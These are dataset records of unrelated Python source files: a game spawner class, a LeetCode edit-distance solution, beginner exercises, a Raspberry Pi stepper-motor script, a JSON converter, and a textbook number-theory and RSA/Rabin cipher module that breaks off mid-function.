+{"seq_id":"33637073493","text":"#Embedded file name: c:/depot/games/branches/release/EVE-TRANQUILITY/carbon/common/script/entities/Spawners/actionProcSpawner.py\nimport GameWorld\nimport cef\n\nclass ActionProcSpawner(cef.RuntimeSpawner):\n __guid__ = 'cef.ActionProcSpawner'\n\n def __init__(self, entitySceneID, dynamicSpawnID, recipeTypeID, posProp, rotProp):\n position = GameWorld.GetPropertyForCurrentPythonProc(posProp)\n rotation = GameWorld.GetPropertyForCurrentPythonProc(rotProp)\n cef.RuntimeSpawner.__init__(self, entitySceneID, dynamicSpawnID, recipeTypeID, position, rotation)","repo_name":"alexcmd/eve","sub_path":"eve-8.21.494548/carbon/common/script/entities/Spawners/actionProcSpawner.py","file_name":"actionProcSpawner.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"}
+{"seq_id":"13633370003","text":"class Solution:\n # opt[m][n] is the minimum edit distance required for word1[:m+1] and word2[:n+1]\n # if word1[m] == word2[n]: opt[m][n] = opt[m-1][n-1]\n # else:\n # 1: replace a character opt[m][n] = opt[m-1][n-1] + 1\n # 2: delete a character from word1 opt[m][n] = opt[m-1][n] + 1\n # 3: insert a charcter to word1 opt[m][n] = opt[m][n-1] + 1\n # opt[m][n] = minimum of above 3 cases.\n # Since we add a padding for opt, when we consider the solution at position (m,n)\n # We are checking the char of word1[m-1] and word2[n-1]\n # null h o r s e\n # null 0 1 2 3 4 5\n # r 1 N N N N N\n # o 2 N N N N N\n # s 3 N N N N N\n def minDistance(self, word1: str, word2: str) -> int:\n self.word1=word1\n self.word2=word2\n self.opt=[[None]*(len(word2)+1) for i in range(len(word1)+1)]\n for i in range(len(word2)+1):\n self.opt[0][i] = i\n for i in range(len(word1)+1):\n self.opt[i][0] = i\n return self.helper(len(word1),len(word2))\n\n \n def helper(self,m,n):\n if self.opt[m][n] is not None:\n return self.opt[m][n]\n if self.word1[m-1] == self.word2[n-1]:\n self.opt[m][n]=self.helper(m-1,n-1)\n else:\n self.opt[m][n]=min(self.helper(m-1,n-1)+1,self.helper(m,n-1)+1,self.helper(m-1,n)+1)\n return self.opt[m][n]\n \n \n ","repo_name":"ruifan831/leetCodeRecord","sub_path":"72_Edit_Distance.py","file_name":"72_Edit_Distance.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"5716751029","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/8/10 21:39 下午\n# @Author : HanChen\n# @File : 7_8.py\n# @Software: Sublime Text\n\n# ------------------ example01 ------------------\n\"\"\"\n7-8 熟食店:创建一个名为 sandwich_orders 的列表,在其中包含各种三明治的名字;再创建一个名为 finished_sandwiches 的空列表。\n 遍历列表 sandwich_orders,对于其中的每种三明治,都打印一条消息,如 I made your tuna sandwich,并将其移到列表finished_sandwiches。\n 所有三明治都制作好后,打印一条消息,将这些三明治列出来。\n\"\"\"\nsandwich_orders = ['veggie', 'grilled cheese', 'turkey', 'roast beef']\nfinished_sandwiches = []\n\nwhile sandwich_orders:\n current_sandwich = sandwich_orders.pop()\n print(\"I'm working on your \" + current_sandwich + \" sandwich.\")\n finished_sandwiches.append(current_sandwich)\n\nprint(\"\\n\")\nfor sandwich in finished_sandwiches:\n print(\"I made a \" + sandwich + \" sandwich.\")\n# ------------------ example01 ------------------\n","repo_name":"HanChen1988/PythonStudy","sub_path":"Book/BookNo001/Chapter_07/python_work/7_8.py","file_name":"7_8.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"35530260348","text":"#!/usr/bin/python\n\n##--Michael duPont (flyinactor91.com)\n##--Turns a stepper motor based on the current gear setting. Higher gear means faster motor\n\nimport RPi.GPIO as GPIO\nimport time\n\nsevenseg = False\n\nif sevenseg:\n\tfrom Adafruit_7Segment import SevenSegment\n\tsegment = SevenSegment(address=0x70)\n\nGPIO.setmode(GPIO.BCM)\n\n#Setup Buttons\nstepUpPin = 25\nstepDownPin = 18\nGPIO.setup(stepUpPin , GPIO.IN)\nGPIO.setup(stepDownPin , GPIO.IN)\n\n#Display Function\ndef setNumber(value):\n\tif value < 0: segment.setColon(True)\n\telse: segment.setColon(False)\n\tsegment.writeDigit(0 , (abs(value) / 1000)%10)\n\tsegment.writeDigit(1 , (abs(value) / 100)%10)\n\tsegment.writeDigit(3 , (abs(value) / 10)%10)\n\tsegment.writeDigit(4 , abs(value) % 10)\n\ndelay = [0,20,17,14,12,10,8,7,6,5,4,3,2] #milliseconds\ngear , count = 0 , 0\nupdate = True\n\n#Main Loop\nwhile True:\n\tif (GPIO.input(stepUpPin) == False) and (GPIO.input(stepDownPin) == True):\n\t\tif gear < 12 and count == 15:\n\t\t\tgear += 1\n\t\t\tcount = 0\n\t\t\tupdate = True\n\telif (GPIO.input(stepDownPin) == False) and (GPIO.input(stepUpPin) == True):\n\t\tif gear > -12 and count == 15:\n\t\t\tgear = gear - 1\n\t\t\tcount = 0\n\t\t\tupdate = True\n\telif (GPIO.input(stepUpPin) == False) and (GPIO.input(stepDownPin) == False):\n\t\tgear , count = 0 , 0\n\t\tupdate = True\n\tif count < 15: count += 1\n\t#print gear\n\tif sevenseg and update:\n\t\tsetNumber(gear)\n\t\tupdate = False\n\tif gear > 0: forward(int(delay[gear]) / 1000.0, 1)\n\telif gear < 0: backwards(int(delay[abs(gear)]) / 1000.0, 1)\n\telse: time.sleep(0.1)\n","repo_name":"flyinactor91/Raspi-Hardware","sub_path":"Motors/StepSpeed.py","file_name":"StepSpeed.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"43053800299","text":"import sys\r\nimport json\r\n\r\ndef main():\r\n path = sys.argv[1]\r\n with open(path, \"r\", encoding=\"utf-8\") as fp:\r\n color_dict = json.load(fp)\r\n new_dict_arr = []\r\n for i, key in enumerate(color_dict):\r\n new_elem = {\r\n \"name\": key,\r\n \"color\": color_dict[key],\r\n \"sort_val\": i,\r\n \"is_active\": True\r\n }\r\n new_dict_arr.append(new_elem)\r\n with open(sys.argv[2], 'w', encoding=\"utf-8\") as fp:\r\n json.dump(new_dict_arr, fp, ensure_ascii=False, indent=4)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"R-Imai/dailyProgress-calculation","sub_path":"tools/color_config_update.py","file_name":"color_config_update.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"8715315456","text":"# 1. Set the variable `given_name` to the string \"Addison\".\ngiven_name = \"Addison\"\n\n# ------------------------------------------------------------------------------\n# 2. You have 20 candies that you must divide equally among 6 people. How many candies will be left over?\n# Set variables for `candies`, `people`, `left_over` to make your tests pass.\ncandies = 20\npeople = 6\nleft_over = candies % people\n\n# ------------------------------------------------------------------------------\n# 3. Create a function called `greeting` that returns \"Hello, !\",\n# where is the name given as an argument to the function.\ndef greeting(name):\n return f\"Hello, {name}!\"\n\n\n# ------------------------------------------------------------------------------\n# 4. Create a function called `is_odd` that, given a number, will\n# return true if the number is odd and false if it is not. An odd number is a\n# number which, when divided by 2, has a remainder of 1 or -1.\n\n# USING TRY/EXCEPT (I'm still trying to wrap my head around\n# try/except, even after getting this to work!):\ndef is_odd(number):\n output = False\n try:\n output = number % 2 == 1 or number % 2 == -1\n except TypeError:\n print(\"Does not compute\")\n return output\n\n# USING IF/ELSE:\n# def is_odd(number):\n# if number % 2 == 1 or number % 2 == -1:\n# return True\n# else:\n# return False\n\n# ------------------------------------------------------------------------------\n# 5. Create a function called `is_even` that, given a number, will\n# return true if the number is even and false if it is not. An even number is a\n# number which, when divided by 2, has a remainder of 0.\ndef is_even(number):\n #USING IS_ODD\n # return bool((not is_odd(number)) and (type(number) is int) and (number is not 0))\n\n # USING IF/ELSE:\n if number % 2 == 0:\n return True\n else:\n return False\n\n\n\n# ------------------------------------------------------------------------------\n# 6. Create a function called `fahrenheit_to_celsius` that takes a\n# Fahrenheit temperature as an argument and returns the\n# temperature in Celsius.\ndef fahrenheit_to_celsius(fahrenheit):\n celsius = (fahrenheit - 32) * 0.5556\n return int(celsius)\n\n# ------------------------------------------------------------------------------\n# 7. Create a function called `celsius_to_fahrenheit` that takes a\n# Celsius temperature as an argument and returns the\n# temperature in Fahrenheit.\ndef celsius_to_fahrenheit(celsius):\n fahrenheit = (celsius*1.8000) + 32\n return fahrenheit\n\n\n# ------------------------------------------------------------------------------\n# 8. Create a function called `fahrenheit_to_kelvin` that takes a\n# Fahrenheit temperature as an argument and returns the\n# temperature in Kelvin. This function must use your previous\n# fahrenheit_to_celsius function.\n# Absolute zero (0 K) is equivalent to −273.15 C.\n# 1 degree Kelvin equals 1 degree Celsius.\ndef fahrenheit_to_kelvin(fahrenheit):\n kelvin = fahrenheit_to_celsius(fahrenheit) + 273.15\n return kelvin\n\n# ------------------------------------------------------------------------------\n# 9. Create a function called `lesser` that takes two numbers as\n# arguments and returns the lesser of them. This function should\n# use an if/else statement.\ndef lesser(num1, num2):\n if num1 < num2:\n return num1\n elif num1 > num2:\n return num2\n else:\n return \"num1 and num2 are equal.\"\n\n\n# ------------------------------------------------------------------------------\n# 10. 
Create a function called `multigreeting` that takes a name\n# and a language code and returns a version of \"Hello, !\"\n# in the specified language. The supported languages and their\n# translations are below.\n#\n# en - Hello, !\n# es - ¡Hola, !\n# fr - Bonjour, !\n# eo - Saluton, !\n#\n# If any other language code is used, return nothing.\ndef multigreeting(name, language):\n # DICTIONARY\n try:\n multilanguage_greeting_dict = {\n \"en\": f\"Hello, {name}!\",\n \"es\": f\"¡Hola, {name}!\",\n \"fr\": f\"Bonjour, {name}!\",\n \"eo\": f\"Saluton, {name}!\"\n }\n return multilanguage_greeting_dict[language]\n except:\n return\n \n #NO DICTIONARY\n # if language == \"en\":\n # return \"Hello, \" + name + \"!\"\n # elif language == \"es\":\n # return \"¡Hola, \" + name + \"!\"\n # elif language == \"fr\":\n # return \"Bonjour, \" + name + \"!\"\n # elif language == \"eo\":\n # return \"Saluton, \" + name + \"!\"\n # else:\n # return\n\n# ------------------------------------------------------------------------------\n# 11. The greatest common divisor (https://en.wikipedia.org/wiki/Greatest_common_divisor)\n# is the largest integer that, given two other integers, can be divided into them. For\n# example, the greatest common divisor of 24 and 81 is 3. The greatest common divisor of\n# 10 and 25 is 5.\n#\n# One method of calculating the greatest common divisor is the \"binary GCD algorithm.\"\n# (https://en.wikipedia.org/wiki/Greatest_common_divisor#Binary_GCD_algorithm)\n# It can be written out like the following:\n#\n# Input: a, b positive integers\n# Output: The greatest common divisor, which is g * 2**d\n# d = 0\n# while a and b are both even\n# a = a/2\n# b = b/2\n# d = d + 1\n# while a != b\n# if a is even then a = a/2\n# else if b is even then b = b/2\n# else if a > b then a = (a – b)/2\n# else b = (b – a)/2\n# g = a\n# output g * 2**d\n\n\n# Write a function called `gcd` that takes two arguments and returns the greatest\n# common divisor using the instructions above.\ndef gcd(a, b):\n # TRYING TERNARY OPERATORS--THIS DIDN'T WORK\n # d = 0\n # while is_even(a) and is_even(b):\n # a = a / 2\n # b = b / 2\n # d = d + 1\n # while a != b:\n # a = a / 2 if is_even(a) else b = b / 2 if is_even(b) else a = (a - b) / 2 if a > b else b = (b - a) / 2\n # ALTERNATELY===\n # a = a / 2 if is_even(a) else (a - b) / 2\n # b = b / 2 if is_even(b) else (b - a) / 2\n # ===\n # g = a\n # return g * 2**d\n\n # TRYING A TUPLE WITH TERNARY OPERATORS\n counter = 0\n while is_even(a) and is_even(b):\n a = a / 2\n b = b / 2\n counter += 1\n ab_tuple = (a, b)\n while a != b:\n while is_even(a) or is_even(b):\n ab_tuple = (a/2, b/2) if is_even(a) and is_even(b) else (a/2, b) if is_even(a) \\\n and not is_even(b) else (a, b/2) if not is_even(a) and is_even(b) else (a, b)\n a = ab_tuple[0]\n b = ab_tuple[1]\n ab_tuple = ((a-b)/2, b) if a > b else (a, (b-a)/2)\n a = ab_tuple[0]\n b = ab_tuple[1]\n return a * 2**counter\n\n # ORIGINAL\n # counter = 0\n # while is_even(a) and is_even(b):\n # a = a / 2\n # b = b / 2\n # counter += 1\n # while a != b:\n # if is_even(a):\n # a = a / 2\n # elif is_even(b):\n # b = b / 2\n # elif a > b:\n # a = (a - b) / 2\n # else:\n # b = (b - a) / 2\n # g = a\n # return g * 2**counter\n","repo_name":"Momentum-PT-Team-3/python-problem-set-1-arieljsmith","sub_path":"problem_set_1.py","file_name":"problem_set_1.py","file_ext":"py","file_size_in_byte":7125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
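The binary GCD pseudocode quoted in the comments above transcribes nearly line for line into Python. A compact sketch (the name binary_gcd is illustrative), checked against the stated examples gcd(24, 81) = 3 and gcd(10, 25) = 5:

def binary_gcd(a: int, b: int) -> int:
    d = 0
    while a % 2 == 0 and b % 2 == 0:   # factor out shared powers of two
        a //= 2
        b //= 2
        d += 1
    while a != b:
        if a % 2 == 0:
            a //= 2
        elif b % 2 == 0:
            b //= 2
        elif a > b:
            a = (a - b) // 2
        else:
            b = (b - a) // 2
    return a * 2 ** d                  # g * 2**d, as in the pseudocode

assert binary_gcd(24, 81) == 3
assert binary_gcd(10, 25) == 5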
+{"seq_id":"28627058785","text":"import random \nfrom collections import Counter\nimport time\nimport math\nfrom functools import wraps\nimport json\n# =====================================================================================\n# 注释掉两条分割线之间的东西来使用\n\n\n# import numpy as np \n# import torch\n# from torch import nn\n# import pandas as pd\n# import click\n# # import time\n# # from functools import wraps\n\n\n# # 当我对func函数装饰的时候,自然需要传入func作为实参\n# # @add_time 等价于 add_time(func),因此我有一个新的函数g接住add_time的返回值,这里假设返回的函数是wrap_func\n# # 当我执行g的时候,实际上执行的是wrap_func,而执行wrap_func实际上主体在执行func,因此wrap_func的参数需要传func的参数\n# def add_time(func):\n# # 这个wraps是固定写法,为了函数文档和函数名字的不变\n# @wraps(func)\n# def wrap_func(*args,**kwds):\n# s = time.time()\n# # 这是我的函数的主体部分,我希望在前后加上一些东西\n# ans = func(*args,**kwds)\n# e = time.time()\n# print(f'Time for {func.__name__} is {e - s}s')\n# return ans\n# return wrap_func\n\n\n\n# class BatchNorm(nn.Module):\n# '''\n# input X is (B,C,H,W)\n# '''\n# def __init__(self):\n# super().__init__()\n\n# def forward(self,X):\n# return (X - X.mean(dim=(0,2,3),keepdim=True)) / X.std(dim=(0,2,3),keepdim=True)\n\n# class LayerNorm(nn.Module):\n# '''\n# input X is (B,C,H,W)\n# '''\n# def __init__(self):\n# super().__init__()\n\n# def forward(self,X):\n# return (X - X.mean(dim=(1,2,3),keepdim=True)) / X.std(dim=(1,2,3),keepdim=True)\n\n# class InstanceNorm(nn.Module):\n# '''\n# input X is (B,C,H,W)\n# '''\n# def __init__(self):\n# super().__init__()\n\n# def forward(self,X):\n# return (X - X.mean(dim=(2,3),keepdim=True)) / X.std(dim=(2,3),keepdim=True)\n\n\n# def shape_conv(h,h_k,stride,padding):\n# return int((h - h_k + stride + 2 * padding) / stride)\n\n# def shape_trans_conv(h,h_k,stride,padding,out_padding=0):\n# \"\"\"\n# H_out = (H_in - 1)*stride - 2*padding + kernel_size + out_padding\n# If we choose stride = 2,kernel_size = 2 and both padding are 0\n# Then the H and W are doubled\n# \"\"\"\n# return int(\n# (h - 1) * stride - 2 * padding + h_k + out_padding\n# )\n\n\n# def draw_table(m,mode):\n# \"\"\"\n# mode = 'add' or 'mul'\n# \"\"\"\n\n# sheet = np.zeros((m,m))\n# if mode == 'add':\n# for i in range(m):\n# for j in range(m):\n# sheet[i,j] = (i + j) % m\n# else:\n# for i in range(m):\n# for j in range(m):\n# sheet[i,j] = (i * j) % m\n\n# ans = pd.DataFrame(sheet)\n# ans.to_excel(f'm={m}_mode={mode}.xlsx')\n\n# class PixelNorm(nn.Module):\n# def __init__(self):\n# super(PixelNorm,self).__init__()\n \n# def forward(self,X):\n# tmp = X * X\n# return X / torch.sqrt(tmp.sum(dim=1,keepdim=True))\n\n# class Maxout(nn.Module):\n# def __init__(self,num_in,num_out,pieces):\n# super(Maxout,self).__init__()\n# self.W = nn.Parameter(torch.randn(num_in,num_out,pieces))\n# self.b = nn.Parameter(torch.randn(num_out,pieces))\n# def forward(self,X):\n# return torch.from_numpy(np.max(np.tensordot(X.detach().numpy(),self.W.detach().numpy(),axes=1) + self.b.detach().numpy(),axis=2))\n\n\n\n\n# =====================================================================================\n\n\n\ndef add_time(func):\n # 这个wraps是固定写法,为了函数文档和函数名字的不变\n @wraps(func)\n def wrap_func(*args,**kwds):\n s = time.time()\n # 这是我的函数的主体部分,我希望在前后加上一些东西\n ans = func(*args,**kwds)\n e = time.time()\n print(f'Time for {func.__name__} is {e - s}s')\n return ans\n return wrap_func\n\n\ndef __lcm(a:int,b:int) -> int:\n return a*b//gcd(a,b)\n\ndef lcm(*a):\n '''lcm(3,4,5,6,7)'''\n assert len(a) > 1,f'The number of input of function lcm must be bigger than 1'\n ans = __lcm(a[0],a[1])\n for item in a[2:]:\n ans = __lcm(ans,item)\n 
return ans\n pass\n\n\n\ndef __gcd(a,b):\n a = abs(a)\n b = abs(b)\n if a == 0:\n return b\n if b == 0:\n return a\n\n while a!=0 and b!=0:\n a,b = b,a%b\n\n if b == 0:\n return a\n if a == 0:\n return b\n \n\n\ndef gcd(*a):\n '''\n 求多个整数的最大公因数\n gcd(12,32,45,64)\n '''\n # for item in a:\n # if item == 1:\n # return 1\n # if len(a) == 2:\n # return __gcd(a[0],a[1])\n # else:\n # d = __gcd(a[0],a[1])\n # for i in range(2,len(a)):\n # d = __gcd(d,a[i])\n # if d == 1:\n # return d\n # return d\n l = len(a)\n assert l>1,f'The length of list should be bigger than 1'\n gcd = 1\n for i in range(l-1):\n x = abs(a[i])\n y = abs(a[i+1])\n while x!=0 and y!=0:\n x,y = y,x%y\n if x == 0:\n gcd = y\n else:\n gcd = x\n if gcd == 1:\n return gcd\n return gcd\n\n\ndef is_prime (n):\n n = int(n)\n if n == 1:\n return False\n\n if n > 1e6:\n return is_large_prime(int(n))\n upper = int(n ** 0.5)\n upper += 1\n for i in range(2,upper):\n if n % i == 0 :\n return False\n return True\n\n\ndef get_prime (N):\n '''获取前小于等于N的所有素数'''\n a = [True] * (N + 1)\n indices = list(range(2,N + 1))\n for index in indices:\n if not a[index]:\n pass \n else :\n i = 2\n while index * i <= N :\n a[i * index] = False \n i += 1\n ans = list(filter(lambda x:a[x],indices))\n return ans\n\n\ndef bezout(a,b):\n '''计算贝祖等式'''\n s2 = 0\n s1 = 1\n t2 = 1\n t1 = 0\n q = int(a / b)\n r2 = a % b\n r1 = b\n\n while r2 != 0:\n s2,s1 = -q * s2 + s1 , s2\n t2,t1 = -q * t2 + t1 , t2\n q = int(r1 / r2)\n r2,r1 = -q * r2 + r1 , r2\n return (s2,t2)\n\n\n\n\n# @add_time\ndef get_inverse(a,m):\n '''求解a模m的逆元'''\n tmp = bezout(a,m)[0]\n while tmp <= 0:\n tmp += m\n return tmp\n\n\ndef china_res(b:list,m:list):\n '''\n the first element of returned tuple is the ANS\\n\n the second element of returned tuple is the product of M_i\\n\n '''\n M = 1\n for item in m:\n M *= item\n \n ans = 0\n \n for i in range(len(m)):\n m_i = m[i]\n M_i = int(M / m_i)\n M_i_inverse = get_inverse(M_i,m_i)\n ans += int(b[i] * M_i * M_i_inverse)\n \n # ans %= M\n ans = ans % M\n # print(ans)\n # print(M)\n return (ans,M)\n\ndef ten2two(n:int,total_bits:int=8):\n '''n should be positive'''\n sign = (n >= 0)\n n = abs(n)\n tmps = []\n while n != 0:\n tmps.append(int(n&1))\n n >>= 1\n tmps.append(0)\n if not sign:\n for i in range(len(tmps)):\n tmps[i] = 1 if tmps[i] == 0 else 0\n tmps[0] += 1\n for i in range(len(tmps)):\n if tmps[i] == 2:\n tmps[i] = 0\n if i < len(tmps) - 1:\n tmps[i + 1] += 1\n else:\n tmps.append(1)\n tmps = tmps[::-1]\n tmps = ''.join(str(item) for item in tmps)\n tmps = tmps[0] + tmps[0]*(total_bits - len(tmps)) + tmps[1:] if total_bits >= len(tmps) else tmps[len(tmps) - total_bits:]\n return tmps\n\n\ndef euler_function(n:int):\n '''求n的欧拉函数phi(n)'''\n N = n\n primes = get_prime(n)\n p_set = []\n for p in primes:\n while n % p == 0:\n n /= p\n p_set.append(p)\n p_set = set(p_set)\n ans = N\n for p in p_set:\n ans *= (1 - 1/p)\n return int(ans)\n\n\ndef solve_foce(a:int,b:int,m:int):\n '''\n solve_first_order_congruence_equation\n return value is a tuple\n the first element of tuple is constant\n the second element of tuple is the coefficient of t\n '''\n gcd_a_m = gcd(a,m)\n a1 = get_inverse(int(a/gcd_a_m), int(m/gcd_a_m))\n a2 = b / gcd_a_m * a1\n a2 = int(a2)\n return (a2,int(m/gcd_a_m))\n\n\n\n# @add_time\ndef fast_power(base:int,power:int,m:int) -> int:\n '''\n return base^power mod m\n '''\n ans = 1\n while power != 0:\n if power & 1:\n ans = ans * base % m\n base = base * base % m\n power >>= 1\n return ans \n\ndef get_all_factors(n:int):\n 
'''获取n所有的因数'''\n s = set()\n for i in range(1,int(math.sqrt(n) + 1)+1):\n if n % i == 0:\n s.add(i)\n s.add(n // i)\n return s\n\n\ndef factor(n:int):\n '''\n factor(n)\n 对n进行素因数分解\n 算数基本定理进行分解\n '''\n l = []\n target = int(math.sqrt(n)) + 1\n for i in range(2,target+1):\n while n % i == 0:\n n = n // i\n l.append(i)\n if n != 1:\n l.append(n)\n return dict(Counter(l))\n\ndef euler_judge(a:int,p:int):\n '''判断a是不是模p的平方剩余'''\n ans = fast_power(a,(p-1)//2,p)\n return ans if ans==1 else ans - p\n\ndef legendre(a:int,p:int):\n '''计算勒让德符号(a/p)'''\n if a % p == 0:\n return 0\n return euler_judge(a,p)\n\ndef theorem_4_3_4(a,p):\n if a == 2:\n return (-1) ** ((p**2-1)/8)\n elif gcd(a,2*p) == 1:\n tmp = 0\n for k in range(1,(p-1)//2 + 1):\n tmp += int(a*k/p)\n return (-1) ** tmp\n else:\n print(f'gcd(a,2p) != 1')\n\n\ndef m2m(m,e,b):\n '''\n return m^e % b\n '''\n result=1\n m1=m\n while(e>=1):\n e1=e%2\n if(e1==1):\n result=(m1*result)%b\n m1=(m1**2)%b\n e=e//2\n return int(result)\n\n# class RSA():\n# @staticmethod\n# def hello_static():\n# print(f'This is {RSA.__name__} static method!')\n\n# @classmethod\n# def hello_class(cls):\n# print(f'This is {RSA.__name__} class method!')\n\n# def __init__(self,p=19260817,q=19260817):\n# self.p = p\n# self.q = q\n# self.n = p * q\n# self.phi = (self.p -1) * (self.q -1)\n# self.e = random.randint(2,self.phi)\n# while gcd(self.e,self.phi) != 1:\n# self.e = random.randint(2,self.phi)\n# self.d = get_inverse(self.e,self.phi)\n# self.char_to_index = {}\n# self.index_to_char = {}\n# self.set_char()\n \n# def __func(self,num):\n# if num < 10:\n# return '0' + str(num)\n# else :\n# return str(num)\n \n# def set_char(self,char_set = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' + 'abcdefghijklmnopqrstuvwxyz' + ' ,.?!' + '0123456789'):\n \n \n# self.char_set = char_set\n# indices = [self.__func(i) for i in range(len(self.char_set))]\n# self.char_to_index = {k:v for k,v in zip(self.char_set,indices)}\n# self.index_to_char = {k:v for v,k in self.char_to_index.items()}\n\n\n# def digitalize(self,m):\n# if not isinstance(m,str):\n# m = str(m)\n# ans = []\n# for item in m:\n# ans.append(self.char_to_index.get(item))\n# return ''.join(ans)\n \n# def dedigitalize(self,c):\n# if not isinstance(c,str):\n# c = str(c)\n# ans = []\n# for i in range(0,len(c),2):\n# ans.append(self.index_to_char.get(c[i] + c[i+1]))\n# return ''.join(ans)\n \n# def lock(self,m):\n# if not isinstance(m,int):\n# m = int(m)\n# c = m2m(m,self.e,self.n)\n# return c\n\n# def unlock(self,c):\n# if not isinstance(c,int):\n# c = int(c)\n# m = m2m(c,self.d,self.n)\n# return m\n \ndef two2ten(n:str)->int:\n n = list(n)[::-1]\n ans = 0\n for index in range(len(n)):\n ans += int(n[index]) * 2**index\n return ans\n\n\ndef func(n:str):\n k,n = n.split('.')\n base = 10 ** (len(n))\n n = int(n)\n count = 0\n ans = []\n for i in range(40):\n n *= 2\n ans.append(int(n // base))\n count += 1\n if count == 4:\n ans.append(' ')\n count = 0\n n = n % base\n if n == 0:\n break\n weishu = ''.join(str(item) for item in ans)\n\n return k + '.' 
+ weishu\n\ndef jianfa(a:str,b:str):\n '''二进制减法 a需要比b大'''\n A = [0] * len(a)\n B = [0] * len(b)\n for i in range(len(a)):\n A[i] = int(a[i])\n for i in range(len(b)):\n B[i] = int(b[i])\n a = A\n b = B\n a = a[::-1]\n b = b[::-1]\n for index in range(len(b)):\n a[index] -= b[index]\n for index in range(len(a)):\n while a[index] < 0:\n a[index] += 2\n a[index + 1] -= 1\n a = a[::-1]\n return ''.join(str(item) for item in a)\n\ndef get_quadratic_residue(m:int):\n '''获取模m的二次剩余'''\n ans = set()\n for x in range(m):\n a = x**2 % m\n if gcd(a, m) == 1:\n ans.add(a)\n return ans\n\ndef theorem_4_6_3(a:int,p:int):\n '''课本149页的定理4.6.3'''\n assert p%2==1 and is_prime(p),f'p={p} is not an odd prime number!'\n \n t = int(factor(p-1).get(2,0))\n s = (p-1) // 2**t\n a_inverse = get_inverse(a,p)\n\n while True:\n n = random.randint(1,p)\n if gcd(n,p) == 1 and legendre(n,p) != 1:\n break\n b = fast_power(n,s,p)\n ans = [0] * t\n ans[-1] = fast_power(a,(s+1)//2,p)\n for index in range(t-2,-1,-1):\n flag = fast_power((a_inverse * ans[index + 1]**2),2**(index),p)\n if flag % p == 1:\n j = 0\n else:\n j = 1\n ans[index] = (ans[index + 1] * b**(j * 2**(t - index - 2))) % p\n return ans[0]\n\ndef theorem_4_6_2(a:int,p:int,q:int):\n '''solve this : x^2 mod p*q = a'''\n assert is_prime(p) and (p+1) % 4 == 0,f'You cannot use theorem_4_6_2 because p={p} is not prime like 4k+3'\n assert is_prime(q) and (q+1) % 4 == 0,f'You cannot use theorem_4_6_2 because q={q} is not prime like 4k+3'\n assert legendre(a,p)==1, f'You cannot use theorem_4_6_2 because p={p} does not satisfiy legendre'\n assert legendre(a,q)==1, f'You cannot use theorem_4_6_2 because q={q} does not satisfiy legendre'\n\n s,t = bezout(q,p)\n s,t = s*q,t*p\n s1 = fast_power(a,(p+1)//4,p)\n t1 = fast_power(a,(q+1)//4,q)\n ans = [0] * 4\n ans[0] = s1*s + t1*t\n ans[1] = -s1*s + t1*t\n ans[2] = s1*s - t1*t\n ans[3] = -s1*s - t1*t\n for index in range(len(ans)):\n ans[index] %= (p*q)\n return tuple(ans)\n\n\n# @click.command()\n# @click.option('--a',type=int)\n# @click.option('--m',type=int)\ndef enumerate_quadratic(a,m):\n '''暴力求解x^2 mod m == a'''\n ans = []\n for x in range(m):\n if x**2 % m == a:\n ans.append(x)\n print(ans)\n return tuple(ans)\n\nclass Rabin():\n def __init__(self,p=19260803,q=19260767):\n self.p = p\n self.q = q\n self.n = self.p * self.q \n self.charset = ' ,.?!' 
+ '0123456789' + 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' + 'abcdefghijklmnopqrstuvwxyz'\n self.char_to_index = {\n char:index + 12345678 for index,char in enumerate(self.charset)\n }\n self.index_to_char = {\n index:char for char,index in self.char_to_index.items()\n }\n self.group_len = 16\n def lock(self,m):\n cypertext = ''\n m = str(m)\n for char in m:\n index = self.char_to_index[char]\n c = str(fast_power(index,2,self.n))\n c = '0'*(self.group_len - len(c)) + c\n cypertext += c\n return cypertext\n\n def unlock(self,c):\n c = str(c)\n m = ''\n for index in range(0,len(c),self.group_len):\n c_single = int(c[index:index+self.group_len])\n c_num = theorem_4_6_2(c_single,self.p,self.q)\n for num in c_num:\n if num < 1e9:\n m += self.index_to_char[num]\n break\n\n return m\n\n\ndef theorem_4_7_1(p:int):\n '''\n 课本P159定理4.7.1\n 求解x^2 + y^2 = p\n p = 2 or p = 4k + 1\n '''\n assert p==2 or p%4==1 ,'p != 2 or p is not like 4k + 1'\n x = theorem_4_6_3(-1,p)\n y = 1\n m = (x**2 + y**2)//p\n while m != 1:\n u = x % m \n v = y % m\n x,y = (u*x + v*y)//m , (u*y - v*x)//m\n m = (x**2 + y**2) //p\n return x,y\n\ndef get_exp(a,m):\n '''获得a模m的指数e'''\n assert gcd(a,m) == 1,f'gcd({a},{m})不是1,不满足指数的条件!'\n i = 1\n while fast_power(a,i,m) != 1:\n i += 1\n return i\n\ndef is_primitive_root(a:int,m:int):\n '''判断a是不是模m原根'''\n assert gcd(a,m) == 1,f'a = {a} , m = {m} 并不互素,不满足原根或指数的判断条件!'\n flag = True\n phi = euler_function(m)\n e = get_exp(a,m)\n return e == phi\n pass\n\n\ndef get_prime_factors(n):\n '''获取n所有的素因子'''\n l = list(factor(n).keys())\n return l\n\n\ndef get_primitive_root(n):\n '''求n的原根'''\n # assert is_prime(n) and n != 2,f'{n} is not odd prime number!'\n if is_prime(n) and n != 2:\n l = get_prime_factors(n-1)\n l = list(map(lambda x:(n-1)//x,l))\n ans = []\n for g in range(2,n):\n if gcd(g,n) != 1:\n continue\n flag =True\n for index in l:\n if fast_power(g,index,n) == 1:\n flag = False\n break\n if flag:\n ans.append(g)\n return ans\n else:\n print(f'm = {n} is not odd prime number, so using enumerate to get all primitive roots of m = {n}')\n ans = []\n for i in range(1,n):\n try:\n if is_primitive_root(i,n):\n ans.append(i)\n except AssertionError:\n 